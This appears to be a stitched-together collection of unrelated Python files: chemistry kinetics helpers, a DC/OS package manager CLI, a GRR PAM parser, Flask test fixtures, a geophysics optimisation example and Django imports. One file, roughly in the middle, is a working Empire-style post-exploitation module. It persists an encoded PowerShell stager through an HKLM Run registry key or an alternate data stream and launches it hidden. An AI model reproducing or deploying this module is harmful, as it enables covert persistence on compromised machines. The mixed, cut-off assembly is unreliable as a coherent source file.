returns its stoichiometric coefficient of the specified species.
Returns a negative value if the species is a reactant.
solution = cantera solution object
species = string of species name
reaction = reaction string or list of reaction strings.
Stoichiometry is calculated by: product_stoich_coeff - reactant_stoich_coeff
"""
# recursively deal with lists of reactions
if not isinstance(reaction,str):
coefficients = np.empty(len(reaction))
for index, reaction_string in enumerate(reaction):
coefficients[index] = obtain_stoichiometry_of_species(solution,species,reaction_string)
return coefficients
# deal with individual reactions
assert isinstance(reaction,str)
reaction_index = solution.reaction_equations().index(reaction)
reactant_stoich_coeff = solution.reactant_stoich_coeff(species, reaction_index)
product_stoich_coeff = solution.product_stoich_coeff(species, reaction_index)
if product_stoich_coeff > 0 or reactant_stoich_coeff > 0:
return product_stoich_coeff - reactant_stoich_coeff
raise Exception('Species {} is not in reaction {}'.format(species,reaction))
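# Sign-convention example (sketch; the reaction string must appear verbatim in
# solution.reaction_equations()):
#
#     obtain_stoichiometry_of_species(gas, 'O2', 'H + O2 <=> O + OH')  # -> -1.0
#     obtain_stoichiometry_of_species(gas, 'OH', 'H + O2 <=> O + OH')  # ->  1.0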
def weight_reaction_dataframe_by_stoich_coefficients(df, solution, species):
"""
returns a dataframe of reactions over time weighted by the stoichiometric
coefficient of the species string `species`.
"""
reactions = find_reactions( solution, df, species)
reaction_strings = list(reactions.columns)
stoichiometries = obtain_stoichiometry_of_species(solution,
species,
reaction_strings)
return reactions * stoichiometries
def find_reactions(solution, df,species):
"""
finds the reaction columns in the net_reaction dataframe which contain
the species specified and returns them.
"""
included_columns = []
rxn_string_to_rxn_index = dict(zip(solution.reaction_equations(),range(solution.n_reactions)))
for rxn_name in df.columns:
sln_index = rxn_string_to_rxn_index[rxn_name]
try:
if solution.product_stoich_coeff(species,sln_index) !=0 or \
solution.reactant_stoich_coeff(species,sln_index) !=0:
included_columns.append(rxn_name)
except KeyError:
print("Error obtained in find_reactions,\ncheck to ensure the columns in `df`\ncorrespond to the reactions in `solution`")
raise
df_my_reactions = df[included_columns]
if df_my_reactions.empty:
raise Exception('No reactions found for species {}'.format(species))
return df_my_reactions
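# Putting the helpers together (sketch; `df` is indexed by time with one
# column per reaction equation):
#
#     rxns = find_reactions(gas, df, 'CH3')              # columns involving CH3
#     flux = consumption_pathways(gas, df, 'CH3', 1e-3)  # pd.Series near t=1e-3 s
#     ratios = branching_ratios(df, gas, 'CH3')          # normalized pathways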
| |
"""Panda package management
Usage:
pkgpanda activate <id>... [options]
pkgpanda swap <package-id> [options]
pkgpanda active [options]
pkgpanda fetch --repository-url=<url> <id>... [options]
pkgpanda add <package-tarball> [options]
pkgpanda list [options]
pkgpanda remove <id>... [options]
pkgpanda setup [options]
pkgpanda uninstall [options]
pkgpanda check [--list] [options]
Options:
--config-dir=<conf-dir> Use an alternate directory for finding machine
configuration (roles, setup flags). [default: {default_config_dir}]
--no-systemd Don't try starting/stopping systemd services
--no-block-systemd Don't block waiting for systemd services to come up.
--root=<root> Testing only: Use an alternate root [default: {default_root}]
--state-dir-root=<root> Testing only: Use an alternate package state directory root
[default: {default_state_dir_root}]
--repository=<repository> Testing only: Use an alternate local package
repository directory [default: {default_repository}]
--rooted-systemd Use $ROOT/dcos.target.wants for systemd management
rather than /etc/systemd/system/dcos.target.wants
"""
import os
import sys
from itertools import groupby
from os import umask
from subprocess import CalledProcessError, check_call
from docopt import docopt
from pkgpanda import actions, constants, Install, PackageId, Repository
from pkgpanda.exceptions import PackageError, PackageNotFound, ValidationError
def print_repo_list(packages):
pkg_ids = list(map(PackageId, sorted(packages)))
for name, group_iter in groupby(pkg_ids, lambda x: x.name):
group = list(group_iter)
if len(group) == 1:
print(group[0])
else:
print(name + ':')
for package in group:
print(" " + package.version)
def uninstall(install, repository):
print("Uninstalling DC/OS")
# Remove dcos.target
# TODO(cmaloney): Make this not quite so magical
print("Removing dcos.target")
print(os.path.dirname(install.systemd_dir) + "/dcos.target")
check_call(['rm', '-f', os.path.dirname(install.systemd_dir) + "/dcos.target"])
# Cleanup all systemd units
# TODO(cmaloney): This is much more work than we need to do the job
print("Deactivating all packages")
install.activate([])
# NOTE: All python libs need to be loaded before this so they are in-memory before we do the delete
# Remove all well known files, directories
# TODO(cmaloney): This should be a method of Install.
print("Removing all runtime / activation directories")
active_names = install.get_active_names()
new_names = [name + '.new' for name in active_names]
old_names = [name + '.old' for name in active_names]
all_names = active_names + new_names + old_names
assert len(all_names) > 0
if '/' in all_names + [install.root]:
print("Cowardly refusing to rm -rf '/' as part of uninstall.", file=sys.stderr)
print("Uninstall directories: ", ','.join(all_names + [install.root]), file=sys.stderr)
sys.exit(1)
check_call(['rm', '-rf'] + all_names)
# Removing /opt/mesosphere
check_call(['rm', '-rf', install.root])
def find_checks(install, repository):
checks = {}
for active_package in install.get_active():
tmp_checks = {}
tmp_checks[active_package] = []
package_check_dir = repository.load(active_package).check_dir
if not os.path.isdir(package_check_dir):
continue
for check_file in sorted(os.listdir(package_check_dir)):
if not os.access(os.path.join(package_check_dir, check_file), os.X_OK):
print('WARNING: `{}` is not executable'.format(check_file), file=sys.stderr)
continue
tmp_checks[active_package].append(check_file)
if tmp_checks[active_package]:
checks.update(tmp_checks)
return checks
def list_checks(checks):
for check_dir, check_files in sorted(checks.items()):
print('{}'.format(check_dir))
for check_file in check_files:
print(' - {}'.format(check_file))
def run_checks(checks, install, repository):
exit_code = 0
for pkg_id, check_files in sorted(checks.items()):
check_dir = repository.load(pkg_id).check_dir
for check_file in check_files:
try:
check_call([os.path.join(check_dir, check_file)])
except CalledProcessError:
print('Check failed: {}'.format(check_file), file=sys.stderr)
exit_code = 1
return exit_code
def main():
arguments = docopt(
__doc__.format(
default_config_dir=constants.config_dir,
default_root=constants.install_root,
default_repository=constants.repository_base,
default_state_dir_root=constants.STATE_DIR_ROOT,
),
)
umask(0o022)
# NOTE: Changing root or repository will likely break actually running packages.
install = Install(
os.path.abspath(arguments['--root']),
os.path.abspath(arguments['--config-dir']),
arguments['--rooted-systemd'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'],
manage_users=True,
add_users=not os.path.exists('/etc/mesosphere/manual_host_users'),
manage_state_dir=True,
state_dir_root=os.path.abspath(arguments['--state-dir-root']))
repository = Repository(os.path.abspath(arguments['--repository']))
try:
if arguments['setup']:
actions.setup(install, repository)
sys.exit(0)
if arguments['list']:
print_repo_list(repository.list())
sys.exit(0)
if arguments['active']:
for pkg in sorted(install.get_active()):
print(pkg)
sys.exit(0)
if arguments['add']:
actions.add_package_file(repository, arguments['<package-tarball>'])
sys.exit(0)
if arguments['fetch']:
for package_id in arguments['<id>']:
actions.fetch_package(
repository,
arguments['--repository-url'],
package_id,
os.getcwd())
sys.exit(0)
if arguments['activate']:
actions.activate_packages(
install,
repository,
arguments['<id>'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'])
sys.exit(0)
if arguments['swap']:
actions.swap_active_package(
install,
repository,
arguments['<package-id>'],
not arguments['--no-systemd'],
not arguments['--no-block-systemd'])
sys.exit(0)
if arguments['remove']:
for package_id in arguments['<id>']:
try:
actions.remove_package(install, repository, package_id)
except PackageNotFound:
pass
sys.exit(0)
if arguments['uninstall']:
uninstall(install, repository)
sys.exit(0)
if arguments['check']:
checks = find_checks(install, repository)
if arguments['--list']:
list_checks(checks)
sys.exit(0)
# Run all checks
sys.exit(run_checks(checks, install, repository))
except ValidationError as ex:
print("Validation Error: {0}".format(ex), file=sys.stderr)
sys.exit(1)
except PackageError as ex:
print("Package Error: {0}".format(ex), file=sys.stderr)
sys.exit(1)
except Exception as ex:
print("ERROR: {0}".format(ex), file=sys.stderr)
sys.exit(1)
print("unknown command", file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
main()
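# Typical invocations (sketch; the package ids and repository URL are
# hypothetical, subcommands are those documented in the docopt string above):
#
#   pkgpanda list
#   pkgpanda fetch --repository-url=https://example.com/repo mesos--1.2.3
#   pkgpanda activate mesos--1.2.3 java--8.0
#   pkgpanda check --list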
| |
#!/usr/bin/env python
"""Parsers for Linux PAM configuration files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import os
import re
from future.builtins import zip
from grr_response_core.lib import parsers
from grr_response_core.lib import utils
from grr_response_core.lib.parsers import config_file
from grr_response_core.lib.rdfvalues import config_file as rdf_config_file
class PAMFieldParser(config_file.FieldParser):
"""Field parser for PAM configurations."""
# The syntax is based on:
# http://linux.die.net/man/5/pam.d
PAMDIR = "/etc/pam.d"
OLD_PAMCONF_FILENAME = "/etc/pam.conf"
PAMCONF_RE = re.compile(
r"""
(\S+) # The "type".
\s+ # separator
( # Now match the "control" argument.
\[[^\]]*\] # Complex form. e.g. [success=ok default=die] etc.
| \w+ # Or a single word form.
) # End of the "control" argument.
\s+ # separator
(\S+) # The "module-path".
(?:\s+(.*))? # And the optional "module-arguments" is anything else.
""", re.VERBOSE)
def _FixPath(self, path):
# Anchor any relative paths in the PAMDIR
if not os.path.isabs(path):
return os.path.join(self.PAMDIR, path)
else:
return path
def EnumerateAllConfigs(self, pathspecs, file_objects):
"""Generate RDFs for the fully expanded configs.
Args:
pathspecs: A list of pathspecs corresponding to the file_objects.
file_objects: A list of file handles.
Returns:
A tuple of a list of RDFValue PamConfigEntries found & a list of strings
which are the external config references found.
"""
# Convert the stats & file_objects into a cache of a
# simple path keyed dict of file contents.
cache = {}
for pathspec, file_obj in zip(pathspecs, file_objects):
cache[pathspec.path] = utils.ReadFileBytesAsUnicode(file_obj)
result = []
external = []
# Check to see if we have the old pam config file laying around.
if self.OLD_PAMCONF_FILENAME in cache:
# The PAM documentation says if it contains config data, then
# it takes precedence over the rest of the config.
# If it doesn't, the rest of the PAMDIR config counts.
result, external = self.EnumerateConfig(None, self.OLD_PAMCONF_FILENAME,
cache)
if result:
return result, external
    # If we made it here, there isn't an old-style pam.conf file worth
    # speaking of, so process everything!
for path in cache:
# PAM uses the basename as the 'service' id.
service = os.path.basename(path)
r, e = self.EnumerateConfig(service, path, cache)
result.extend(r)
external.extend(e)
return result, external
def EnumerateConfig(self, service, path, cache, filter_type=None):
"""Return PamConfigEntries it finds as it recursively follows PAM configs.
Args:
service: A string containing the service name we are processing.
path: A string containing the file path name we want.
cache: A dictionary keyed on path, with the file contents (list of str).
filter_type: A string containing type name of the results we want.
Returns:
A tuple of a list of RDFValue PamConfigEntries found & a list of strings
which are the external config references found.
"""
result = []
external = []
path = self._FixPath(path)
# Make sure we only look at files under PAMDIR.
# Check we have the file in our artifact/cache. If not, our artifact
# didn't give it to us, and that's a problem.
# Note: This should only ever happen if it was referenced
# from /etc/pam.conf so we can assume that was the file.
if path not in cache:
external.append("%s -> %s", self.OLD_PAMCONF_FILENAME, path)
return result, external
for tokens in self.ParseEntries(cache[path]):
if path == self.OLD_PAMCONF_FILENAME:
        # We are processing the old style PAM conf file. It's a special case.
        # Its format is "service type control module-path module-arguments",
        # i.e. the 'service' is the first arg; the rest of the line
        # is like everything else except for that addition.
try:
service = tokens[0] # Grab the service from the start line.
tokens = tokens[1:] # Make the rest of the line look like "normal".
except IndexError:
continue # It's a blank line, skip it.
# Process any inclusions in the line.
new_path = None
filter_request = None
try:
# If a line starts with @include, then include the entire referenced
# file.
# e.g. "@include common-auth"
if tokens[0] == "@include":
new_path = tokens[1]
# If a line's second arg is an include/substack, then filter the
# referenced file only including entries that match the 'type'
# requested.
# e.g. "auth include common-auth-screensaver"
elif tokens[1] in ["include", "substack"]:
new_path = tokens[2]
filter_request = tokens[0]
except IndexError:
# It's not a valid include line, so keep processing as normal.
pass
# If we found an include file, enumerate that file now, and
      # include it where we are in this config file.
if new_path:
# Preemptively check to see if we have a problem where the config
# is referencing a file outside of the expected/defined artifact.
# Doing it here allows us to produce a better context for the
# problem. Hence the slight duplication of code.
new_path = self._FixPath(new_path)
if new_path not in cache:
external.append("%s -> %s" % (path, new_path))
continue # Skip to the next line of the file.
r, e = self.EnumerateConfig(service, new_path, cache, filter_request)
result.extend(r)
external.extend(e)
else:
# If we have been asked to filter on types, skip over any types
# we are not interested in.
if filter_type and tokens[0] != filter_type:
continue # We can skip this line.
# If we got here, then we want to include this line in this service's
# config.
# Reform the line and break into the correct fields as best we can.
# Note: ParseEntries doesn't cope with what we need to do.
match = self.PAMCONF_RE.match(" ".join(tokens))
if match:
p_type, control, module_path, module_args = match.group(1, 2, 3, 4)
# Trim a leading "-" from the type field if present.
if p_type.startswith("-"):
p_type = p_type[1:]
result.append(
rdf_config_file.PamConfigEntry(
service=service,
type=p_type,
control=control,
module_path=module_path,
module_args=module_args))
return result, external
class PAMParser(parsers.MultiFileParser):
"""Artifact parser for PAM configurations."""
output_types = [rdf_config_file.PamConfig]
supported_artifacts = ["LinuxPamConfigs"]
def __init__(self, *args, **kwargs):
super(PAMParser, self).__init__(*args, **kwargs)
self._field_parser = PAMFieldParser()
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
del knowledge_base # Unused.
results, externals = self._field_parser.EnumerateAllConfigs(
pathspecs, filedescs)
yield rdf_config_file.PamConfig(entries=results, external_config=externals)
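# Example of what PAMCONF_RE extracts from one pam.d line (sketch):
#
#   "auth [success=ok default=die] pam_unix.so nullok try_first_pass"
#   -> type="auth", control="[success=ok default=die]",
#      module_path="pam_unix.so", module_args="nullok try_first_pass"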
| |
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Registry',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
'registry key. This has an easy detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'KeyName' : {
'Description' : 'Key name for the run trigger.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
keyName = self.options['KeyName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
script += "'Registry persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
# store the script in the specified alternate data stream location
if adsPath != '':
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''more < "+adsPath+"\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath + "."
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "$((gp "+path+" "+name+")."+name+")"
script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"start -Win Hidden -A \"-enc "+locationString+"\" powershell\"';"
script += "'Registry persistence established "+statusMsg+"'"
return script
| |
import contextlib
import datetime
import mock
import os
import subprocess
from flask_migrate import upgrade
import pytest
from responses import RequestsMock
import sqlalchemy
from app.main.models import User
from app.config import SQLALCHEMY_DATABASE_URI
from app.extensions import db as _db, user_datastore
from app.factory import create_app
from tests.oidc_testbed import MockOIDCProvider
TEST_DATABASE_URI = SQLALCHEMY_DATABASE_URI + '_test'
config = {
'issuer': 'http://example.com',
}
@pytest.yield_fixture(scope='session')
def responses():
with RequestsMock(assert_all_requests_are_fired=False) as patch:
yield patch
@pytest.yield_fixture(scope='session')
def provider(responses):
op = MockOIDCProvider(responses, config)
op.init_endpoints()
yield op
op.remove_endpoints()
@pytest.yield_fixture(scope='session')
def app(provider):
app = create_app(**{
'TESTING': True,
'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,
'PREFERRED_URL_SCHEME': 'http',
'WTF_CSRF_ENABLED': False,
'OIDC_CLIENT': {
'issuer': config['issuer'],
'client_id': 'test-client',
'client_secret': 'test-secret'
},
'OIDC_PROVIDER': {
'issuer': 'https://localhost:5000',
'subject_id_hash_salt': 'salt'
}
})
ctx = app.app_context()
ctx.push()
yield app
ctx.pop()
def reset_migrations(db):
# reset migrations, otherwise they will not be reapplied
conn = db.engine.connect()
try:
conn.execute('DELETE FROM alembic_version')
except sqlalchemy.exc.ProgrammingError:
pass
finally:
conn.close()
def teardown_db(db_url, db):
if db_url.drivername == 'postgresql':
db.drop_all()
reset_migrations(db)
if db_url.drivername == 'sqlite':
if os.path.exists(db_url.database):
os.unlink(db_url.database)
def init_db(db_url, db):
sqlalchemy.orm.configure_mappers()
try:
teardown_db(db_url, db)
except sqlalchemy.exc.OperationalError as e:
if 'does not exist' in str(e):
create_db(db_url)
init_db(db_url, db)
upgrade()
def create_db(db_url):
dbname = db_url.database
if db_url.drivername == 'postgresql':
subprocess.call(['/usr/bin/env', 'createdb', dbname], timeout=1)
if db_url.drivername == 'sqlite':
# created automatically by migrations
pass
@pytest.yield_fixture(scope='session')
def db(request, app):
_db.app = app
db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)
init_db(db_url, _db)
yield _db
teardown_db(db_url, _db)
@pytest.yield_fixture(scope='function')
def db_session(db, request):
connection = db.engine.connect()
transaction = connection.begin()
session_factory = sqlalchemy.orm.sessionmaker(bind=connection)
db.session = session = sqlalchemy.orm.scoped_session(session_factory)
yield session
transaction.rollback()
connection.close()
session.remove()
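# Tests that take `db_session` run inside a connection-level transaction that
# is rolled back at teardown, so no rows leak between tests. A minimal sketch
# (model import as above):
#
#     def test_user_roundtrip(db_session):
#         db_session.add(User(email='a@example.com', name='A', active=True))
#         db_session.commit()  # commits inside the outer, rolled-back transaction
#         assert db_session.query(User).count() == 1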
@pytest.fixture
def selenium(db, live_server, selenium):
"""Override selenium fixture to always use flask live server"""
return selenium
@pytest.fixture
def test_user(db_session):
user = User(email='test@example.com', name='Test Test', active=True)
db_session.add(user)
db_session.commit()
return user
@pytest.fixture
def test_admin_user(db_session):
admin = user_datastore.find_or_create_role('admin')
user = user_datastore.create_user(
email="admin@example.com",
roles=[admin],
is_superadmin=True,
can_accept_suits=True)
user_datastore.commit()
return user
@pytest.fixture
def unnamed_user(db_session):
user = User(email='test@example.com', active=True)
db_session.add(user)
db_session.commit()
return user
@pytest.yield_fixture
def login(client):
def do_login(user):
with client.session_transaction() as session:
session['user_id'] = user.id
session['_fresh'] = True
yield do_login
with client.session_transaction() as session:
del session['user_id']
del session['_fresh']
@pytest.yield_fixture
def unnamed_user_logged_in(unnamed_user, login):
login(unnamed_user)
yield unnamed_user
@pytest.yield_fixture
def logged_in(test_user, login):
login(test_user)
yield test_user
@pytest.yield_fixture
def admin_logged_in(test_admin_user, login):
login(test_admin_user)
yield test_admin_user
@pytest.fixture
def utcnow():
@contextlib.contextmanager
def patch_now(module, val):
with mock.patch(module) as dt:
dt.utcnow.return_value = val
dt.side_effect = datetime.datetime
yield
return patch_now
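# Sketch of pinning time with the `utcnow` fixture (the patched module path is
# hypothetical):
#
#     def test_created_at(utcnow):
#         fixed = datetime.datetime(2020, 1, 1)
#         with utcnow('app.main.models.datetime', fixed):
#             ...  # code under test now sees datetime.utcnow() == fixed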
| |
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2015 California Institute of Technology.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Example use of Forward Mogi Model
in mystic and PARK optimization frameworks.
(built for mystic "trunk" and with park-1.2)
for help, type "python rosetta_mogi_example.py --help"
"""
from math import pi
from numpy import array
try: # check if park is installed
import park
#import park.parksnob
import park.parkde
Model = park.Model
__park = True
except ImportError:
Model = object
__park = False
def ForwardMogiFactory(params):
x0,y0,z0,dV = params
def forward_mogi(evalpts):
""" evalpts should be a 2D (2 by N) numpy array """
dx = evalpts[0,:] - x0
dy = evalpts[1,:] - y0
dz = 0 - z0
        c = dV * 3. / 4. / pi
        # or equivalently c = (3/4) a^3 dP / rigidity
        # (since dV = pi a^3 dP / rigidity for a Mogi source)
        # where a = sphere radius, dP = delta Pressure
r2 = dx*dx + dy*dy + dz*dz
C = c / pow(r2, 1.5)
return array((C*dx,C*dy,C*dz))
return forward_mogi
# --- Cost Function stuff ---
def filter_for_zdisp(displacements):
    return -displacements[2,:]
# Here is the cost function
def vec_cost_function(params):
model = ForwardMogiFactory(params)
zdisp = filter_for_zdisp(model(stations))
return 100. * (zdisp - data_z)
# Here is the normed version [NOTE: fit this one!]
def cost_function(params):
x = vec_cost_function(params)
return numpy.sum(real((conjugate(x)*x)))
# a cost function with parameters "normalized"
def vec_cost_function2(params):
sca = numpy.array([1000, 100., 10., 0.1])
return vec_cost_function(sca * params)
# --- Cost Function end ---
# --- Plotting stuff ---
import pylab
def plot_sol(params,linestyle='b-'):
forward_solution = ForwardMogiFactory(params)
xx = arange(-30,30,0.1)+actual_params[0]
yy = 0*xx + actual_params[1]
ss = array((xx, yy))
dd = forward_solution(ss)
pylab.plot(ss[0,:],-dd[2,:],'%s'%linestyle,linewidth=2.0)
def plot_noisy_data():
import pylab
pylab.plot(stations[0,:],-data[2,:]+noise[2,:],'k.')
# --- Plotting end ---
# --- Call to Mystic's Fmin optimizer ---
def mystic_optimize(point):
from mystic.monitors import Monitor, VerboseMonitor
from mystic.tools import getch, random_seed
random_seed(123)
from mystic.solvers import NelderMeadSimplexSolver as fmin
from mystic.termination import CandidateRelativeTolerance as CRT
simplex, esow = VerboseMonitor(50), Monitor()
solver = fmin(len(point))
solver.SetInitialPoints(point)
solver.SetEvaluationMonitor(esow)
solver.SetGenerationMonitor(simplex)
solver.Solve(cost_function, CRT())
solution = solver.Solution()
return solution
# --- Mystic end ---
# --- Call to Mystic's DE optimizer ---
def mystic_optimize2(point):
from mystic.monitors import Monitor, VerboseMonitor
from mystic.tools import getch, random_seed
random_seed(123)
from mystic.solvers import DifferentialEvolutionSolver as de
from mystic.termination import ChangeOverGeneration as COG
NPOP = 50
simplex, esow = VerboseMonitor(50), Monitor()
solver = de(len(point),NPOP)
solver.SetInitialPoints(point)
solver.SetEvaluationMonitor(esow)
solver.SetGenerationMonitor(simplex)
solver.Solve(cost_function, COG(generations=100), \
CrossProbability=0.5, ScalingFactor=0.5)
solution = solver.Solution()
return solution
# --- Mystic end ---
# --- Call to Park ---
class MogiModel(Model):
"""a park model:
- parameters are passed as named strings to set them as class attributes
- function that does the evaluation must be named "eval"
- __call__ generated that takes namestring and parameter-named keywords
"""
parameters = ["x0","y0","z0","dV"]
def eval(self, x):
x0 = self.x0
y0 = self.y0
z0 = self.z0
dV = self.dV
f = ForwardMogiFactory((x0,y0,z0,dV))
return f(x)
pass
class Data2D(object):
"""2d model data with the required park functions"""
def __init__(self,z):
self.z = z
return
def residuals(self,model):
zdisp = filter_for_zdisp(model(stations))
return (100. * (zdisp - self.z)).flatten()
pass
def park_optimize(point):
# build the data instance
data2d = Data2D(data_z)
# build the model instance
x0,y0,z0,dV = point
model = MogiModel("mymodel",x0=x0,y0=y0,z0=z0,dV=dV)
# required to set bounds on the parameters
#model.x0 = [-numpy.inf,numpy.inf]
#model.y0 = [-numpy.inf,numpy.inf]
#model.z0 = [-numpy.inf,numpy.inf]
#model.dV = [-numpy.inf,numpy.inf]
model.x0 = [-5000,5000]
model.y0 = [-5000,5000]
model.z0 = [-5000,5000]
model.dV = [-5000,5000]
# add a monitor, and set to print results to the console
handler=park.fitresult.ConsoleUpdate()
# select the fitter, and do the fit
#fitter=park.parksnob.Snobfit()
fitter=park.parkde.DiffEv()
# 'fit' requires a list of tuples of (model,data)
result=park.fit.fit([(model,data2d)],fitter=fitter,handler=handler)
# print results
#print result.calls # print number of function calls
#result.print_summary() # print solution
# get the results back into a python object
solution = {}
for fitparam in result.parameters:
solution[fitparam.name] = fitparam.value
solution = [ solution['mymodel.x0'],
solution['mymodel.y0'],
solution['mymodel.z0'],
solution['mymodel.dV'] ]
return solution
# --- Park end ---
if __name__ == '__main__':
# parse user selection to solve with "mystic" [default] or "park"
# also can select mystic's optimizer: "diffev" or "fmin" [default]
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-p","--park",action="store_true",dest="park",\
default=False,help="solve with park (instead of mystic)")
parser.add_option("-m","--mystic",action="store_true",dest="mystic",\
default=False,help="solve with mystic's DE optimizer)")
parsed_opts, parsed_args = parser.parse_args()
from numpy import pi, sqrt, array, mgrid, random, real, conjugate, arange
from numpy.random import rand
import numpy
# Let the "actual parameters" be :
actual_params = [1234.,-500., 10., .1]
actual_forward = ForwardMogiFactory(actual_params)
print "Target: %s" % actual_params
# The data to be "fitted"
xstations = array([random.uniform(-30,30) for i in range(300)])+actual_params[0]
ystations = 0*xstations + actual_params[1]
stations = array((xstations, ystations))
data = actual_forward(stations)
# generate noise... gaussian distribution with mean 0, sig 0.1e-3
noise = array([[random.normal(0,0.1e-3) for i in range(data.shape[1])] for j in range(data.shape[0])])
# Here is the "observed data"
data_z = -data[2,:] + noise[2,:]
# plot the noisy data
plot_noisy_data()
point = [1000,-100,0,1] # cg will do badly on this one
# DO OPTIMIZATION STUFF HERE TO GET SOLUTION
if parsed_opts.park: #solve with park's DE
if __park:
print "Solving with park's DE optimizer..."
solution = park_optimize(point)
else:
print('This option requires park to be installed')
exit()
elif parsed_opts.mystic: #solve with mystic's DE
print "Solving with mystic's DE optimizer..."
solution = mystic_optimize2(point)
else: #solve with mystic's fmin
print "Solving with mystic's fmin optimizer..."
solution = mystic_optimize(point)
print "Solved: %s" % solution
# plot the solution
plot_sol(solution,'r-')
pylab.show()
# End of file
| |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime
from collections import defaultdict
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.db import transaction
from django.http import HttpResponse, Http404, HttpResponseBadRequest
from django.shortcuts import get_object_or_404, redirect, _get_queryset, render
from django.utils.translation import ugettext_lazy as _, ugettext
from django.utils.decorators import method_decorator
from django.views.generic.edit import ModelFormMixin
from django.views.decorators.csrf import csrf_protect
from django.views.generic.edit import FormMixin
from django.views.generic.base import TemplateResponseMixin
